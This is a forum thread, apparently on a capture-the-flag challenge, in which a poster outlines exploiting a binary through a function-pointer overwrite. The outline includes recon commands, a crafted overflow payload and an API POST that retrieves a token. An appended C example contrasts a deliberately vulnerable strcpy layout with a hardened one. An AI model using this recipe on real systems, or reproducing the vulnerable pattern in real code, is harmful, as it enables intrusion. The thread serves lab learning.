Forum Discussion
PRABAKARANRAMAMURTHY
Bronze III
6 days ago
Trick or Treat on Specter Street: Morphy's Mansion Challenge
I understand that the move_logger is the vulnerable program, and tried a few methods to exploit it. However, where is the token.txt? Anyone managed to find it? "Whatever means necessary" is quite ...
PRABAKARANRAMAMURTHY
Bronze III
4 days ago
For those who are looking for some hints:
The strategy was to use No-ROP Function-Pointer Overwrite.
Following the steps below:
- Check Backend Health
  curl -s http://x.x.x.x/api/health
- Analyze Vulnerable Binary:
  nm -C ./move_logger | grep rotate_old_logs
  objdump -d ./move_logger | awk '/<system@plt>/{print; getline; print}'
- Confirm Stack Layout in GDB
  (use PEDA and execute: p &moves , p &log to find the buffer size)
- Craft Overflow Payload:
  Payload: e4aaaaaaaaaaaaaaXXXXXX0000000000
- Exploit via API - curl POST
- Retrieve Token by using curl
Hope that helps.
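As an added illustration of the function-pointer-overwrite pattern the hint above describes, here is a hypothetical C model of the vulnerable layout beside a hardened version; it is not the challenge's move_logger source, and the struct layout, the 16-byte buffer size, the rotate_old_logs stub and the helper names are all assumptions.

```c
#include <stdio.h>
#include <string.h>

#define MOVE_LEN 16   /* assumed buffer size; in the hint it is measured with p &moves / p &log */

/* Hypothetical layout modelled on the hint: a fixed move buffer immediately
 * followed by a function pointer used for log rotation. Not the real binary. */
struct move_log {
    char moves[MOVE_LEN];
    void (*rotate)(const char *path);
};

static int rotate_calls;
static void rotate_old_logs(const char *path) { (void)path; rotate_calls++; }

/* Vulnerable pattern: an unbounded copy lets input run past moves[] and
 * overwrite rotate, so the indirect call below dispatches wherever the
 * overflow pointed it (in the hint, at system@plt). Shown only, never called. */
int log_move_unsafe(struct move_log *l, const char *input) {
    strcpy(l->moves, input);            /* no length check */
    l->rotate("/tmp/moves.log");        /* pointer may no longer be rotate_old_logs */
    return 0;
}

/* Hardened pattern: refuse oversized input before copying, and verify the
 * pointer still holds the expected target before calling through it. */
int log_move_safe(struct move_log *l, const char *input) {
    size_t n = strlen(input);
    if (n >= MOVE_LEN)
        return -1;                      /* too long: reject rather than truncate silently */
    memcpy(l->moves, input, n + 1);
    if (l->rotate != rotate_old_logs)
        return -2;                      /* integrity check: never call a modified pointer */
    l->rotate("/tmp/moves.log");
    return 0;
}

int main(void) {
    struct move_log l = { "", rotate_old_logs };
    /* constructed inputs: 15 characters fit, 40 would run into the pointer */
    printf("short move list: %d\n", log_move_safe(&l, "e4e5Nf3Nc6Bb5a6"));
    printf("oversized input: %d\n",
           log_move_safe(&l, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"));
    return 0;
}
```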